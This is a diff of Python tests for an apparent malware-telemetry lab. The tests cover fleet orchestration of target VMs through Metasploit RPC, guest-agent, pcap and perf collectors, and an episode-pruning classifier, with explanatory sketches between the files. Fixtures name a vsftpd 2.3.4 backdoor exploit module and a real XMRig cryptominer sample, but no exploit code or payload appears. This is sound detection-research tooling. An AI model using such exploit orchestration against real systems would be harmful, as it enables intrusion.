|
||||
"""When BRIDGE is set in the parent env, the per-slot subprocess
|
||||
env must carry it through so launch_target.sh enters tap+bridge mode."""
|
||||
from orchestrator import fleet
|
||||
cfg = _fleet_cfg_with_modules(tmp_path)
|
||||
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
|
||||
monkeypatch.setenv("BRIDGE", "br-malware")
|
||||
_patch_subprocess(monkeypatch)
|
||||
capacity = fleet.detect_capacity()
|
||||
sample = cfg.manifest.samples[0]
|
||||
fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
|
||||
assert _RecordingPopen.calls[-1]["env"]["BRIDGE"] == "br-malware"
|
||||
|
||||
|
||||
def test_fleet_assigns_unique_port_base_per_slot(monkeypatch, tmp_path) -> None:
|
||||
"""Concurrent Tier-3 slots can't share the host-side hostfwd port
|
||||
or all targets stomp on each other's vsftpd:21 → 21 mapping. The
|
||||
fleet must shift PORT_BASE per slot."""
|
||||
from orchestrator import fleet
|
||||
cfg = _fleet_cfg_with_modules(tmp_path)
|
||||
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
|
||||
_patch_subprocess(monkeypatch)
|
||||
capacity = fleet.detect_capacity()
|
||||
|
||||
sample = cfg.manifest.samples[0]
|
||||
fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
|
||||
fleet._run_slot(cfg, slot=1, sample=sample, episode_index=0, capacity=capacity)
|
||||
fleet._run_slot(cfg, slot=2, sample=sample, episode_index=0, capacity=capacity)
|
||||
|
||||
port_bases = [c["env"]["PORT_BASE"] for c in _RecordingPopen.calls]
|
||||
assert len(set(port_bases)) == len(port_bases), \
|
||||
f"PORT_BASE collision across slots: {port_bases}"
|
||||
|
||||
|
||||
def test_manifest_marks_real_when_sha256_present(tmp_path: Path) -> None:
|
||||
p = tmp_path / "real.toml"
|
||||
p.write_text(
|
||||
'[[sample]]\n'
|
||||
'name = "real-one"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
|
||||
'sha256 = "abc123"\n'
|
||||
'\n[[sample]]\n'
|
||||
'name = "mimic-one"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
|
||||
)
|
||||
m = SampleManifest.load(p)
|
||||
by_name = {s.name: s for s in m.samples}
|
||||
assert by_name["real-one"].kind == "real"
|
||||
assert by_name["mimic-one"].kind == "mimic"
|
||||
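The fleet tests above pin down three behaviours: callback-payload modules are skipped when `BRIDGE` is unset, the full catalog rotates when it is set, and every slot gets its own `PORT_BASE`. A minimal sketch of selection logic that would satisfy those assertions follows. The real `fleet._run_slot` is not shown in this diff, so the round-robin rotation, the port numbers, and the names `ModuleSketch`, `pick_module`, and `port_base_for_slot` are all hypothetical.

```python
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class ModuleSketch:
    """Hypothetical stand-in for an exploit module config."""
    name: str
    requires_bridge: bool


def pick_module(
    modules: Iterable[ModuleSketch],
    *,
    bridge: Optional[str],
    slot: int,
    episode_index: int,
) -> Optional[str]:
    """Rotate through the eligible modules; None means fall back to Tier 2."""
    # Without a bridge, callback payloads can never connect back, so drop them.
    names = sorted(m.name for m in modules if bridge or not m.requires_bridge)
    if not names:
        return None
    # Assumed rotation rule: plain round-robin over (slot + episode).
    return names[(slot + episode_index) % len(names)]


def port_base_for_slot(slot: int, *, base: int = 20000, stride: int = 100) -> int:
    """Give each slot a disjoint host-side port window (values are assumptions)."""
    return base + slot * stride
```

Sorting the names keeps the rotation deterministic across runs, which is what lets a test walk a fixed number of episodes and expect to see every eligible module.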
152
tests/test_guest_agent.py
Normal file
|
|
@@ -0,0 +1,152 @@
|
|||
"""Tests for the host-side guest-agent collector.
|
||||
|
||||
We simulate the in-guest agent by spinning up a unix socket server
|
||||
(stand-in for the QEMU virtio-serial chardev) that writes a few
|
||||
JSON-lines rows. The collector should read them, re-stamp with the
|
||||
host's monotonic clock, and persist to telemetry-guest.jsonl.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import socket
|
||||
import threading
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from collectors import guest_agent
|
||||
|
||||
|
||||
class FakeAgentServer(threading.Thread):
|
||||
def __init__(self, sock_path: Path, rows: list[dict], delay_s: float = 0.05) -> None:
|
||||
super().__init__(daemon=True)
|
||||
self.sock_path = sock_path
|
||||
self.rows = rows
|
||||
self.delay_s = delay_s
|
||||
self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
|
||||
self._sock.bind(str(sock_path))
|
||||
self._sock.listen(1)
|
||||
self._sock.settimeout(5.0)
|
||||
|
||||
def run(self) -> None:
|
||||
try:
|
||||
conn, _ = self._sock.accept()
|
||||
except socket.timeout:
|
||||
return
|
||||
try:
|
||||
for row in self.rows:
|
||||
conn.sendall((json.dumps(row) + "\n").encode())
|
||||
time.sleep(self.delay_s)
|
||||
time.sleep(0.1)
|
||||
finally:
|
||||
conn.close()
|
||||
self._sock.close()
|
||||
|
||||
|
||||
def test_collector_reads_jsonl_and_restamps(tmp_path: Path) -> None:
|
||||
sock_path = tmp_path / "agent.sock"
|
||||
rows_in = [
|
||||
{
|
||||
"t_guest_mono_ns": 1, "t_guest_wall_ns": 2,
|
||||
"source": "guest_agent", "available_in_deployment": True,
|
||||
"mem_total_bytes": 256 * 1024 * 1024,
|
||||
"mem_available_bytes": 200 * 1024 * 1024,
|
||||
"load_1m_5m_15m": [0.1, 0.05, 0.0],
|
||||
"cpu_total_jiffies": {"user": 10, "system": 5, "idle": 1000},
|
||||
},
|
||||
{
|
||||
"t_guest_mono_ns": 100_000_000, "t_guest_wall_ns": 100_000_002,
|
||||
"source": "guest_agent", "available_in_deployment": True,
|
||||
"mem_total_bytes": 256 * 1024 * 1024,
|
||||
"mem_available_bytes": 198 * 1024 * 1024,
|
||||
},
|
||||
]
|
||||
server = FakeAgentServer(sock_path, rows_in, delay_s=0.02)
|
||||
server.start()
|
||||
out_path = tmp_path / "telemetry-guest.jsonl"
|
||||
stop = threading.Event()
|
||||
|
||||
def stop_after(ms: int) -> None:
|
||||
time.sleep(ms / 1000.0)
|
||||
stop.set()
|
||||
|
||||
threading.Thread(target=stop_after, args=(300,), daemon=True).start()
|
||||
|
||||
rows_written = guest_agent.run_loop(
|
||||
socket_path=sock_path,
|
||||
output_path=out_path,
|
||||
t_mono_origin_ns=time.monotonic_ns(),
|
||||
stop_event=stop,
|
||||
connect_timeout_s=2.0,
|
||||
)
|
||||
server.join(timeout=2)
|
||||
|
||||
assert rows_written == 2
|
||||
persisted = [json.loads(l) for l in out_path.read_text().splitlines()]
|
||||
assert len(persisted) == 2
|
||||
for orig, got in zip(rows_in, persisted):
|
||||
# Original guest timestamps preserved.
|
||||
assert got["t_guest_mono_ns"] == orig["t_guest_mono_ns"]
|
||||
# Host-clock fields added.
|
||||
assert "t_mono_ns" in got
|
||||
assert "t_wall_ns" in got
|
||||
assert got["source"] == "guest_agent"
|
||||
assert got["available_in_deployment"] is True
|
||||
|
||||
|
||||
def test_collector_returns_zero_when_socket_missing(tmp_path: Path) -> None:
|
||||
rows = guest_agent.run_loop(
|
||||
socket_path=tmp_path / "no-socket-here.sock",
|
||||
output_path=tmp_path / "out.jsonl",
|
||||
t_mono_origin_ns=time.monotonic_ns(),
|
||||
stop_event=threading.Event(),
|
||||
connect_timeout_s=0.5,
|
||||
)
|
||||
assert rows == 0
|
||||
|
||||
|
||||
def test_collector_drops_malformed_lines_but_keeps_going(tmp_path: Path) -> None:
|
||||
sock_path = tmp_path / "agent.sock"
|
||||
# Will be sent verbatim; the malformed line should be skipped.
|
||||
payload = (
|
||||
b'{"source":"guest_agent","mem_total_bytes":1}\n'
|
||||
b'this-is-not-json\n'
|
||||
b'{"source":"guest_agent","mem_total_bytes":2}\n'
|
||||
)
|
||||
|
||||
class Server(threading.Thread):
|
||||
def __init__(self) -> None:
|
||||
super().__init__(daemon=True)
|
||||
self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
|
||||
self._sock.bind(str(sock_path))
|
||||
self._sock.listen(1)
|
||||
|
||||
def run(self) -> None:
|
||||
conn, _ = self._sock.accept()
|
||||
try:
|
||||
conn.sendall(payload)
|
||||
time.sleep(0.2)
|
||||
finally:
|
||||
conn.close()
|
||||
self._sock.close()
|
||||
|
||||
s = Server()
|
||||
s.start()
|
||||
out_path = tmp_path / "out.jsonl"
|
||||
stop = threading.Event()
|
||||
threading.Thread(
|
||||
target=lambda: (time.sleep(0.4), stop.set()), daemon=True
|
||||
).start()
|
||||
rows = guest_agent.run_loop(
|
||||
socket_path=sock_path,
|
||||
output_path=out_path,
|
||||
t_mono_origin_ns=time.monotonic_ns(),
|
||||
stop_event=stop,
|
||||
connect_timeout_s=2.0,
|
||||
)
|
||||
s.join(timeout=2)
|
||||
assert rows == 2
|
||||
persisted = [json.loads(l) for l in out_path.read_text().splitlines()]
|
||||
assert [r["mem_total_bytes"] for r in persisted] == [1, 2]
|
||||
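The guest-agent tests above expect the collector to keep the guest's own timestamps, add host-clock fields, and skip lines that are not valid JSON. A minimal sketch of that per-line step, under stated assumptions: `restamp_lines` is a hypothetical helper (the real `guest_agent.run_loop` reads from a unix socket and is not shown here), and treating `t_mono_ns` as an offset from `t_mono_origin_ns` is a guess, since the tests only check that the field is present.

```python
import json
import time
from typing import Iterable


def restamp_lines(lines: Iterable[str], *, t_mono_origin_ns: int) -> list[dict]:
    """Parse JSON-lines rows, drop malformed ones, add host-clock stamps."""
    out: list[dict] = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            row = json.loads(raw)
        except json.JSONDecodeError:
            # A bad line must not end the stream; skip it and keep reading.
            continue
        if not isinstance(row, dict):
            continue
        # Guest fields (t_guest_mono_ns, ...) are left untouched.
        row["t_mono_ns"] = time.monotonic_ns() - t_mono_origin_ns  # assumed semantics
        row["t_wall_ns"] = time.time_ns()
        out.append(row)
    return out
```

Stamping on arrival rather than trusting the guest clock keeps all collectors on one host timeline, at the cost of including transport latency in the host timestamp.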
188
tests/test_pcap.py
Normal file
|
|
@@ -0,0 +1,188 @@
|
|||
"""Tests for the pcap collector's pure-Python parser + bucketizer.
|
||||
|
||||
We synthesize a tiny pcap file in memory (Ethernet + IPv4 + TCP/UDP
|
||||
records with controlled timestamps), feed it to ``bucketize()``, and
|
||||
verify the produced netflow.jsonl rows are correct.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import struct
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from collectors import pcap
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# pcap synthesis helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
_PCAP_GLOBAL_HDR = struct.pack(
|
||||
"<IHHiIII",
|
||||
0xa1b2c3d4, # magic (us)
|
||||
2, 4, # version
|
||||
0, # thiszone
|
||||
0, # sigfigs
|
||||
65535, # snaplen
|
||||
1, # linktype = LINKTYPE_ETHERNET
|
||||
)
|
||||
|
||||
|
||||
def _ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    s = bytes(int(x) for x in src.split("."))
    d = bytes(int(x) for x in dst.split("."))
    total_len = 20 + len(payload)
    return struct.pack(
        ">BBHHHBBH",      # network byte order; first 12 header bytes
        0x45,             # version=4, IHL=5
        0,                # tos
        total_len,
        0, 0, 64, proto,  # id, flags+frag offset, ttl, protocol
        0,                # checksum (don't care)
    ) + s + d + payload
|
||||
|
||||
|
||||
def _tcp(sport: int, dport: int, flags: int) -> bytes:
|
||||
# Minimal 20-byte TCP header: sport, dport, seq, ack, off+flags, win, csum, urg
|
||||
return struct.pack(">HHIIBBHHH",
|
||||
sport, dport,
|
||||
0, 0,
|
||||
0x50, # data offset = 5 (no options)
|
||||
flags,
|
||||
0, 0, 0)
|
||||
|
||||
|
||||
def _udp(sport: int, dport: int, length: int = 8) -> bytes:
|
||||
return struct.pack(">HHHH", sport, dport, length, 0)
|
||||
|
||||
|
||||
def _ether(payload: bytes, ethertype: int = 0x0800) -> bytes:
|
||||
return b"\x02\x00\x00\x00\x00\x01" + b"\x02\x00\x00\x00\x00\x02" + struct.pack(">H", ethertype) + payload
|
||||
|
||||
|
||||
def _record(ts_ns: int, frame: bytes) -> bytes:
|
||||
sec = ts_ns // 1_000_000_000
|
||||
usec = (ts_ns // 1000) % 1_000_000
|
||||
return struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
|
||||
|
||||
|
||||
def _build_pcap(records: list[tuple[int, bytes]]) -> bytes:
|
||||
out = bytearray(_PCAP_GLOBAL_HDR)
|
||||
for ts, frame in records:
|
||||
out += _record(ts, frame)
|
||||
return bytes(out)
|
||||
|
||||
|
||||
def _write_pcap(path: Path, records: list[tuple[int, bytes]]) -> None:
|
||||
path.write_bytes(_build_pcap(records))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_iter_pcap_reads_records_back(tmp_path: Path) -> None:
|
||||
p = tmp_path / "a.pcap"
|
||||
frame = _ether(_ipv4("10.200.0.1", "10.200.0.10", 6, _tcp(40000, 21, flags=0x02)))
|
||||
_write_pcap(p, [(1_000_000_000, frame)])
|
||||
|
||||
records = list(pcap._iter_pcap(p))
|
||||
assert len(records) == 1
|
||||
t_ns, data = records[0]
|
||||
assert t_ns == 1_000_000_000
|
||||
assert data == frame
|
||||
|
||||
|
||||
def test_decode_tcp_syn() -> None:
|
||||
f = _ether(_ipv4("10.200.0.1", "10.200.0.10", 6, _tcp(40000, 21, flags=0x02)))
|
||||
d = pcap._decode(f)
|
||||
assert d["ethertype"] == 0x0800
|
||||
assert d["ip_proto"] == 6
|
||||
assert d["src_ip"] == "10.200.0.1"
|
||||
assert d["dst_ip"] == "10.200.0.10"
|
||||
assert d["src_port"] == 40000
|
||||
assert d["dst_port"] == 21
|
||||
assert d["tcp_flags"] & 0x02
|
||||
|
||||
|
||||
def test_decode_udp_dns_query() -> None:
|
||||
f = _ether(_ipv4("10.200.0.10", "10.200.0.1", 17, _udp(33333, 53)))
|
||||
d = pcap._decode(f)
|
||||
assert d["ip_proto"] == 17
|
||||
assert d["dst_port"] == 53
|
||||
|
||||
|
||||
def test_bucketize_collapses_per_window(tmp_path: Path) -> None:
|
||||
pcap_path = tmp_path / "ep.pcap"
|
||||
netflow_path = tmp_path / "netflow.jsonl"
|
||||
|
||||
bridge_ip = "10.200.0.1"
|
||||
guest_ip = "10.200.0.10"
|
||||
base_ns = 1_700_000_000_000_000_000 # arbitrary, aligned-friendly
|
||||
|
||||
records = [
|
||||
# Bucket A (0..100ms)
|
||||
(base_ns + 5_000_000,
|
||||
_ether(_ipv4(guest_ip, bridge_ip, 6, _tcp(40000, 21, flags=0x02)))),
|
||||
(base_ns + 9_000_000,
|
||||
_ether(_ipv4(bridge_ip, guest_ip, 6, _tcp(21, 40000, flags=0x12)))),
|
||||
# Bucket B (100..200ms): UDP DNS query
|
||||
(base_ns + 105_000_000,
|
||||
_ether(_ipv4(guest_ip, bridge_ip, 17, _udp(33333, 53)))),
|
||||
# Bucket B: TCP RST
|
||||
(base_ns + 199_000_000,
|
||||
_ether(_ipv4(bridge_ip, guest_ip, 6, _tcp(21, 40000, flags=0x04)))),
|
||||
]
|
||||
_write_pcap(pcap_path, records)
|
||||
|
||||
rows_written = pcap.bucketize(
|
||||
pcap_path, netflow_path,
|
||||
bucket_ms=100,
|
||||
t_mono_origin_ns=base_ns,
|
||||
bridge_ip=bridge_ip,
|
||||
)
|
||||
assert rows_written == 2
|
||||
|
||||
rows = [json.loads(l) for l in netflow_path.read_text().splitlines()]
|
||||
a, b = rows
|
||||
assert a["bucket_ms"] == 100
|
||||
# Bucket A: 1 in (SYN), 1 out (SYN-ACK)
|
||||
assert a["pkts_in"] == 1
|
||||
assert a["pkts_out"] == 1
|
||||
assert a["syn_count"] == 2
|
||||
assert a["tcp_new_flows"] == 1 # only the bare SYN counts as new flow
|
||||
assert a["dns_query_count"] == 0
|
||||
assert a["unique_dst_ips"] == 2
|
||||
|
||||
# Bucket B: DNS + RST
|
||||
assert b["dns_query_count"] == 1
|
||||
assert b["rst_count"] == 1
|
||||
|
||||
|
||||
def test_bucketize_returns_zero_for_missing_file(tmp_path: Path) -> None:
|
||||
rows = pcap.bucketize(
|
||||
tmp_path / "nope.pcap",
|
||||
tmp_path / "netflow.jsonl",
|
||||
bucket_ms=100,
|
||||
t_mono_origin_ns=0,
|
||||
)
|
||||
assert rows == 0
|
||||
|
||||
|
||||
def test_bucketize_handles_unknown_ethertype(tmp_path: Path) -> None:
|
||||
p = tmp_path / "x.pcap"
|
||||
netflow = tmp_path / "n.jsonl"
|
||||
# ARP frame (ethertype 0x0806) — counted but not decoded.
|
||||
f = _ether(b"\x00" * 28, ethertype=0x0806)
|
||||
_write_pcap(p, [(1_000_000_000, f)])
|
||||
rows = pcap.bucketize(p, netflow, bucket_ms=100, t_mono_origin_ns=0)
|
||||
assert rows == 1
|
||||
out = json.loads(netflow.read_text().splitlines()[0])
|
||||
# No IP info, but byte/packet count survives.
|
||||
assert out["pkts_in"] + out["pkts_out"] == 1
|
||||
assert out["tcp_count"] == 0
|
||||
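The bucketizer test above relies on two details: a packet's bucket is its offset from the origin divided by the window width, and a SYN-ACK counts toward `syn_count` but not toward `tcp_new_flows`. A minimal sketch of just that arithmetic, assuming packets are already reduced to `(timestamp_ns, tcp_flags)` pairs; `bucket_flags` is a hypothetical helper, not the `pcap.bucketize` implementation.

```python
from collections import defaultdict

TCP_SYN = 0x02
TCP_RST = 0x04
TCP_ACK = 0x10


def bucket_flags(packets, *, origin_ns: int, bucket_ms: int) -> dict[int, dict[str, int]]:
    """Group (ts_ns, tcp_flags) pairs into fixed windows and count flag events."""
    width_ns = bucket_ms * 1_000_000
    buckets: dict[int, dict[str, int]] = defaultdict(
        lambda: {"syn_count": 0, "rst_count": 0, "tcp_new_flows": 0}
    )
    for ts_ns, flags in packets:
        idx = (ts_ns - origin_ns) // width_ns
        row = buckets[idx]
        if flags & TCP_SYN:
            row["syn_count"] += 1
            # Only a bare SYN (no ACK) opens a new flow; SYN-ACK is a reply.
            if not flags & TCP_ACK:
                row["tcp_new_flows"] += 1
        if flags & TCP_RST:
            row["rst_count"] += 1
    return dict(sorted(buckets.items()))
```

Integer floor division keeps the bucket edges exact for nanosecond timestamps, which floating-point division would not guarantee at epoch-scale values.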
82
tests/test_perf_qemu.py
Normal file
|
|
@@ -0,0 +1,82 @@
|
|||
"""Tests for the perf-stat collector — parser logic in isolation
|
||||
(no actual perf invocation, since perf needs CAP_SYS_ADMIN and
|
||||
hardware counters that the test runner can't assume)."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from collectors import perf_qemu
|
||||
|
||||
|
||||
def test_parse_event_line_extracts_fields() -> None:
|
||||
line = '{"interval":0.100123,"counter-value":"1234567","unit":"","event":"cycles"}'
|
||||
evt = perf_qemu.parse_perf_event_line(line)
|
||||
assert evt is not None
|
||||
assert evt["event"] == "cycles"
|
||||
assert evt["interval"] == 0.100123
|
||||
assert evt["counter-value"] == "1234567"
|
||||
|
||||
|
||||
def test_parse_event_line_skips_non_json() -> None:
|
||||
assert perf_qemu.parse_perf_event_line("") is None
|
||||
assert perf_qemu.parse_perf_event_line("garbage") is None
|
||||
assert perf_qemu.parse_perf_event_line("# Performance counter stats") is None
|
||||
|
||||
|
||||
def test_coerce_int_handles_perf_quirks() -> None:
|
||||
assert perf_qemu._coerce_int("1234567") == 1234567
|
||||
assert perf_qemu._coerce_int("1,234,567") == 1234567
|
||||
assert perf_qemu._coerce_int("<not counted>") is None
|
||||
assert perf_qemu._coerce_int("<not supported>") is None
|
||||
assert perf_qemu._coerce_int("") is None
|
||||
assert perf_qemu._coerce_int(None) is None
|
||||
assert perf_qemu._coerce_int(42) == 42
|
||||
|
||||
|
||||
def test_build_row_computes_ipc_and_miss_rate() -> None:
|
||||
agg = {
|
||||
"cycles": 1_000_000_000,
|
||||
"instructions": 660_000_000,
|
||||
"cache-references": 1_000_000,
|
||||
"cache-misses": 50_000,
|
||||
"branches": 100_000_000,
|
||||
"branch-misses": 5_000_000,
|
||||
"page-faults": 12,
|
||||
"context-switches": 20,
|
||||
}
|
||||
row = perf_qemu._build_row(t_mono_origin_ns=0, interval_s=0.1, agg=agg)
|
||||
assert row["source"] == "host_perf"
|
||||
assert row["available_in_deployment"] is False
|
||||
assert row["cycles"] == 1_000_000_000
|
||||
assert row["instructions"] == 660_000_000
|
||||
assert pytest.approx(row["ipc"], abs=1e-9) == 0.66
|
||||
assert pytest.approx(row["cache_miss_rate"], abs=1e-9) == 0.05
|
||||
assert row["interval_s"] == 0.1
|
||||
|
||||
|
||||
def test_build_row_handles_missing_counters() -> None:
|
||||
"""If perf can't enable cache-misses on this hardware, the row
|
||||
should still be valid — just with None for the missing fields."""
|
||||
agg = {"cycles": 100, "instructions": 50}
|
||||
row = perf_qemu._build_row(t_mono_origin_ns=0, interval_s=0.1, agg=agg)
|
||||
assert row["cycles"] == 100
|
||||
assert row["cache_misses"] is None
|
||||
assert row["cache_miss_rate"] is None
|
||||
assert pytest.approx(row["ipc"], abs=1e-9) == 0.5
|
||||
|
||||
|
||||
def test_run_loop_returns_zero_when_perf_missing(tmp_path: Path, monkeypatch) -> None:
|
||||
monkeypatch.setattr(perf_qemu, "perf_available", lambda: False)
|
||||
import threading
|
||||
rows = perf_qemu.run_loop(
|
||||
pid=1,
|
||||
output_path=tmp_path / "telemetry-perf.jsonl",
|
||||
t_mono_origin_ns=0,
|
||||
interval_ms=100,
|
||||
stop_event=threading.Event(),
|
||||
)
|
||||
assert rows == 0
|
||||
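The perf tests above check two derived fields, `ipc` (instructions per cycle) and `cache_miss_rate` (misses per reference), and require `None` whenever a counter is missing. A minimal sketch of that computation and of the counter-value coercion; `coerce_int`, `safe_ratio`, and `derived_metrics` are illustrative names, not the functions in `collectors/perf_qemu.py`.

```python
from typing import Optional, Union


def coerce_int(value: Union[str, int, None]) -> Optional[int]:
    """Turn a perf counter value into an int, or None if it was not counted."""
    if isinstance(value, int):
        return value
    if not value:
        return None
    text = str(value).replace(",", "").strip()
    # Placeholders such as "<not counted>" are not digits and map to None.
    return int(text) if text.isdigit() else None


def safe_ratio(num: Optional[int], den: Optional[int]) -> Optional[float]:
    """Divide only when both counters exist and the denominator is non-zero."""
    if num is None or den is None or den == 0:
        return None
    return num / den


def derived_metrics(agg: dict[str, int]) -> dict[str, Optional[float]]:
    return {
        "ipc": safe_ratio(agg.get("instructions"), agg.get("cycles")),
        "cache_miss_rate": safe_ratio(
            agg.get("cache-misses"), agg.get("cache-references")
        ),
    }
```

Returning `None` instead of `0.0` for an unavailable counter keeps "not measured" distinguishable from "measured as zero" in the persisted rows.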
309
tests/test_prune.py
Normal file
|
|
@@ -0,0 +1,309 @@
|
|||
"""Tests for cis490-prune. Builds synthetic episode tarballs (each
|
||||
flagged with a specific quality issue) and confirms the classifier
|
||||
catches them. Then exercises the index-walk + dry-run / archive /
|
||||
delete actions on a temp tree so we don't touch real data."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import io
|
||||
import json
|
||||
import shutil
|
||||
import subprocess
|
||||
import tarfile
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
# Skip the whole module if zstd isn't on PATH (the prune tool shells
|
||||
# out for decompression, mirroring the shipper).
|
||||
zstd_available = shutil.which("zstd") is not None
|
||||
pytestmark = pytest.mark.skipif(not zstd_available, reason="needs system zstd")
|
||||
|
||||
|
||||
import sys
|
||||
ROOT = Path(__file__).resolve().parent.parent
|
||||
sys.path.insert(0, str(ROOT / "tools"))
|
||||
import prune_episodes as pe # noqa: E402
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# tar+zstd builder
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def _make_tar_zst(out_path: Path, files: dict[str, bytes]) -> None:
    """Build a {episode_id}/<file> layout, tar it, zstd it."""
    raw_tar = io.BytesIO()
    with tarfile.open(fileobj=raw_tar, mode="w") as t:
        for name, data in files.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            t.addfile(info, io.BytesIO(data))
    out_path.parent.mkdir(parents=True, exist_ok=True)
    raw_tmp = out_path.with_suffix(".tar")
    raw_tmp.write_bytes(raw_tar.getvalue())
    try:
        # Close the output handle deterministically instead of leaking it.
        with out_path.open("wb") as fh:
            subprocess.check_call(
                ["zstd", "-q", "-19", "--stdout", str(raw_tmp)],
                stdout=fh,
            )
    finally:
        raw_tmp.unlink(missing_ok=True)
|
||||
|
||||
|
||||
def _meta(*, sample: dict | None = None, exploit: dict | None = None) -> bytes:
|
||||
return json.dumps({
|
||||
"episode_id": "01TEST",
|
||||
"schema_version": 1,
|
||||
"sample": sample,
|
||||
"exploit": exploit,
|
||||
"result": {"phases_observed": ["clean", "infected_running", "dormant"]},
|
||||
}, sort_keys=True).encode()
|
||||
|
||||
|
||||
def _events(rows: list[dict]) -> bytes:
|
||||
return ("\n".join(json.dumps(r, sort_keys=True) for r in rows) + "\n").encode()
|
||||
|
||||
|
||||
def _proc_rows(*, flat: bool, n: int = 80) -> bytes:
"""Synthesize /proc rows with either flat CPU (no phase signal)
or sharply spiking CPU (clear phase boundaries). The tests pair
these rows with a matching labels file."""
|
||||
out: list[dict] = []
|
||||
for i in range(n):
|
||||
t = i * 100_000_000
|
||||
if flat:
|
||||
jiff = 100 + i * 20 # uniform increment → flat CPU%
|
||||
else:
|
||||
# First third clean (low), middle infected (high), last third dormant (low).
|
||||
jiff = (
|
||||
100 + i * 20 if i < n // 3 or i >= 2 * n // 3
|
||||
else 100 + i * 1000 # huge jump for "infected"
|
||||
)
|
||||
out.append({
|
||||
"t_mono_ns": t,
|
||||
"cpu_user_jiffies": jiff,
|
||||
"cpu_sys_jiffies": 0,
|
||||
"rss_bytes": 1024 * 1024,
|
||||
})
|
||||
return ("\n".join(json.dumps(r) for r in out) + "\n").encode()
|
||||
|
||||
|
||||
def _labels(boundary_ns: list[int], names: list[str]) -> bytes:
|
||||
rows = [
|
||||
{"t_mono_ns": t, "phase": p, "prev": names[i - 1] if i else None}
|
||||
for i, (t, p) in enumerate(zip(boundary_ns, names))
|
||||
]
|
||||
return ("\n".join(json.dumps(r) for r in rows) + "\n").encode()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Per-reason classifier tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def _make_episode(tmp_path: Path, **member_overrides) -> Path:
|
||||
"""Default = a healthy episode with sample, exploit, workload events,
|
||||
sharp CPU envelope. Overrides replace specific members."""
|
||||
n = 60
|
||||
end_ns = n * 100_000_000
|
||||
members = {
|
||||
"01TEST/meta.json": _meta(
|
||||
sample={"name": "xmrig", "kind": "real", "family": "XMRig",
|
||||
"category": "cryptominer", "profile": "cpu-saturate",
|
||||
"sha256": "a" * 64},
|
||||
exploit={"module_name": "vsftpd_234_backdoor", "module": "x"},
|
||||
),
|
||||
"01TEST/events.jsonl": _events([
|
||||
{"event": "snapshot_load"},
|
||||
{"event": "workload_setup"},
|
||||
{"event": "workload_started", "phase": "infected_running"},
|
||||
{"event": "workload_killed", "phase": "dormant",
|
||||
"pre_kill_probe": {"yes": "2", "loadavg": "1.4"}},
|
||||
{"event": "episode_end"},
|
||||
]),
|
||||
"01TEST/labels.jsonl": _labels(
|
||||
[0, n // 3 * 100_000_000, 2 * n // 3 * 100_000_000],
|
||||
["clean", "infected_running", "dormant"],
|
||||
),
|
||||
"01TEST/telemetry-proc.jsonl": _proc_rows(flat=False, n=n),
|
||||
}
|
||||
members.update(member_overrides)
|
||||
out = tmp_path / "01TEST.tar.zst"
|
||||
_make_tar_zst(out, members)
|
||||
return out
|
||||
|
||||
|
||||
def test_healthy_episode_has_no_reasons(tmp_path: Path) -> None:
|
||||
tar = _make_episode(tmp_path)
|
||||
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
|
||||
assert q.reasons == [], f"unexpected reasons: {q.reasons}"
|
||||
assert q.sample_name == "xmrig"
|
||||
assert q.module_name == "vsftpd_234_backdoor"
|
||||
|
||||
|
||||
def test_no_sample_flag(tmp_path: Path) -> None:
|
||||
tar = _make_episode(
|
||||
tmp_path,
|
||||
**{"01TEST/meta.json": _meta(sample=None, exploit=None)},
|
||||
)
|
||||
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
|
||||
assert "no-sample" in q.reasons
|
||||
|
||||
|
||||
def test_no_workload_events_flag(tmp_path: Path) -> None:
|
||||
tar = _make_episode(
|
||||
tmp_path,
|
||||
**{"01TEST/events.jsonl": _events([
|
||||
{"event": "snapshot_load"},
|
||||
{"event": "phase_transition", "to": "clean"},
|
||||
{"event": "episode_end"},
|
||||
])},
|
||||
)
|
||||
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
|
||||
assert "no-workload-events" in q.reasons
|
||||
|
||||
|
||||
def test_workload_failed_flag(tmp_path: Path) -> None:
|
||||
tar = _make_episode(
|
||||
tmp_path,
|
||||
**{"01TEST/events.jsonl": _events([
|
||||
{"event": "workload_setup"},
|
||||
{"event": "workload_failed", "phase": "infected_running",
|
||||
"error": "EOF on serial"},
|
||||
{"event": "episode_end"},
|
||||
])},
|
||||
)
|
||||
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
|
||||
assert "workload-failed" in q.reasons
|
